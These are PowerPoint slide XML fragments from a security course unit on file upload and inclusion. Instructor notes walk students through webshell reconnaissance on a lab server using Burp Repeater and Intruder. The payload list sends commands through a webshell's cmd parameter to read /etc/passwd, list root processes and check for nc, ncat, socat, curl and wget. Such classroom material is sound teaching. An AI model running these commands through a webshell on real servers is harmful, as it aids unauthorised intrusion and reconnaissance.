              <a:t>  man:x:6:12:man:/var/cache/man:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  lp:x:7:7:lp:/var/spool/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  mail:x:8:8:mail:/var/mail:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  news:x:9:9:news:/var/spool/news:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  uucp:x:10:10:uucp:/var/spool/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uucp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  proxy:x:13:13:proxy:/bin:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  www-data:x:33:33:www-data:/var/www:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  backup:x:34:34:backup:/var/backups:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  list:x:38:38:Mailing List Manager:/var/list:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  irc:x:39:39:ircd:/var/run/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ircd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  nobody:x:65534:65534:nobody:/nonexistent:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  _apt:x:100:65534::/nonexistent:/bin/false</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Remind students that `/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd` contains a list of all users on the system. It's commonly used to test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshells</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, since the file exists on most Unix systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#### Intruder Review</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Point out that, instead of sending each command manually, you can also use Burp Intruder to send all of them at once.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- While in Repeater, press `Ctrl + I` to send the request to Intruder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Click the **Intruder** pane, and then click **Positions**.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Click **Clear** on the right, then add a position around the value of the `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>` parameter. Make sure the attack type is **Sniper**.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  ![](Images/intruder_position.png)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Click **Payloads**. Add a series of commands, such as: `id`, `ls`, `cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd`, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  ![](Images/intruder_payloads.png)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Click **Start Attack**, and click through the responses to show the results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Emphasize that:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Using Repeater is a quick way to "get your bearings" when experimenting with a new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and/or endpoint on a vulnerable server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Using Intruder once you understand the request/response structure of that endpoint is a fast way to perform reconnaissance.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Take a moment to address questions before proceeding.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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47327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Stu_Webshell_Recon</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99111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the solutions in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Activities/Stu_Webshell_Recon/Solved/README.md </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(duplicated below).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Use Firefox to navigate to: &lt;http://ptl-f99df351-3bdd4c8f.libcurl.so/admin/index.php&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Ensure Foxy Prosy is on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Launch Burp Suite, and click the link to `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>` intercept a request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Send the request to Intruder by pressing `Ctrl + I` in Burp Suite.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Set a position around the `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>` parameter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  ![](Images/positions.png)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Add the below Intruder payloads.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  ```bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   # User and Group ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   # Processes running as root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> aux | grep root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   # Contents of /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   # Existence of network tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>socat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   curl --version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Run the attack, and review the results in the HTTP responses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Point out that the user is `www-data`, and that the `/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd` entry for `www-data` has a shell of `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Emphasize that this means you _cannot_ use your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to open an _interactive_ session (like Git Bash, Terminal, etc.) on the compromised host.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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58691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1/4/2019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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>File Upload &amp; Inclusion</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&lt;Month Date, Year&gt;</a:t>
            </a:r>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latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unit 13.1</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latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>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sz="2500" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>For this exercise, you'll perform some recon on the server you compromised in the previous class.</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Use Firefox to navigate to: &lt;http://ptl-f99df351-3bdd4c8f.libcurl.so/admin/index.php&gt;</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Then, follow the instructions in the .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> README.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> provided via Slack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Good luck!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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a:xfrm>
            <a:off x="4094480" y="80936"/>
            <a:ext cx="4829329" cy="411480"/>
          </a:xfrm>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Recon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183220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err="1">
                <a:solidFill>
                  <a:srgbClr val="FDB072"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FDB072"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Recon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1884918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6869289" cy="704060"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BREAK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3209836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6869289" cy="704060"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Remote File Inclusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="530903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sz="2500" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
